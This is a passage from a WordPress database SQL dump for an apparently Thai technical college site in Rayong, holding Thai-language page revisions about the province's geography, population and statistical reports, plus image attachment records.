ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>2558 <span lang=\"TH\">มีทั้งสิ้น</span> 688,999<span lang=\"TH\"> คน เป็นชาย 339</span>,333<span lang=\"TH\"> คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 349,666 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 271,460 <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,816<span lang=\"TH\"> คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 527.60 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>292.10 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 65.8 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 698,017 <span lang=\"TH\">คนในปี</span> 2561 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4><b><a href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></h4>\r\n<h4 class=\"contentheading\"><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/images/stories/rayongdata60.pdf\">บรรยายสรุปจังหวัดระยอง 2560</a></h4>\r\n</div>\r\n<h4><a href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></h4>\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a>\r\n\r\n \r\n\r\n<b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b>\r\n\r\n<span style=\"color: #0000ff; font-size: medium;\"><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span>\r\n\r\n<b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b>\r\n\r\n<strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong>\r\n\r\n<strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong>\r\n\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a>\r\n<div class=\"article-rel-wrapper\">\r\n\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a>\r\n\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a>\r\n<div class=\"article-rel-wrapper\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-06-18 15:27:15', '2018-06-18 08:27:15', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(3064, 3, '2018-06-18 15:53:12', '2018-06-18 08:53:12', '', '17-5-2561 17-56-09', '', 'inherit', 'closed', 'closed', '', '17-5-2561-17-56-09-2', '', '', '2018-06-18 15:53:12', '2018-06-18 08:53:12', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg', 0, 'attachment', 'image/jpeg', 0),
(3065, 3, '2018-06-18 15:53:19', '2018-06-18 08:53:19', '', '17-5-2561 17-58-52', '', 'inherit', 'closed', 'closed', '', '17-5-2561-17-58-52-2', '', '', '2018-06-18 15:53:19', '2018-06-18 08:53:19', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg', 0, 'attachment', 'image/jpeg', 0),
(3066, 3, '2018-06-18 15:54:32', '2018-06-18 08:54:32', '', '17-5-2561 18-03-44', '', 'inherit', 'closed', 'closed', '', '17-5-2561-18-03-44-2', '', '', '2018-06-18 15:54:32', '2018-06-18 08:54:32', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3067, 3, '2018-06-18 15:55:27', '2018-06-18 08:55:27', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1194\" height=\"500\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1200 alignright\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-952\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53-300x192.jpg\" alt=\"\" width=\"650\" height=\"417\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1204 alignright\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3><img class=\"wp-image-1203 alignright\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"200\" height=\"78\" /></h3>\r\n<img class=\"wp-image-1201 alignright\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"200\" height=\"75\" /><img class=\"wp-image-1202 alignright\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"200\" height=\"76\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-953\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"650\" height=\"442\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46-300x208.jpg\" alt=\"\" width=\"650\" height=\"451\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44-300x219.jpg\" alt=\"\" width=\"200\" height=\"146\" />\r\n\r\n<img class=\"size-full wp-image-3065 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 15:55:27', '2018-06-18 08:55:27', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3068, 3, '2018-06-18 15:56:39', '2018-06-18 08:56:39', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1194\" height=\"500\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1200 alignnone\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-952\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53-300x192.jpg\" alt=\"\" width=\"650\" height=\"417\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1204 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3><img class=\"wp-image-1203 alignnone\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"200\" height=\"78\" /></h3>\r\n<img class=\"wp-image-1201 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"200\" height=\"75\" /><img class=\"wp-image-1202 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"200\" height=\"76\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-953\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"650\" height=\"442\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46-300x208.jpg\" alt=\"\" width=\"650\" height=\"451\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44-300x219.jpg\" alt=\"\" width=\"200\" height=\"146\" />\r\n\r\n<img class=\"size-full wp-image-3065 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 15:56:39', '2018-06-18 08:56:39', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3069, 3, '2018-06-18 15:57:15', '2018-06-18 08:57:15', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1194\" height=\"500\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1200 alignnone\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-952 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53-300x192.jpg\" alt=\"\" width=\"650\" height=\"417\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1204 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3><img class=\"wp-image-1203 alignnone\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"200\" height=\"78\" /></h3>\r\n<img class=\"wp-image-1201 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"200\" height=\"75\" /><img class=\"wp-image-1202 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"200\" height=\"76\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-953\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"650\" height=\"442\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46-300x208.jpg\" alt=\"\" width=\"650\" height=\"451\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44-300x219.jpg\" alt=\"\" width=\"200\" height=\"146\" />\r\n\r\n<img class=\"size-full wp-image-3065 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 15:57:15', '2018-06-18 08:57:15', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
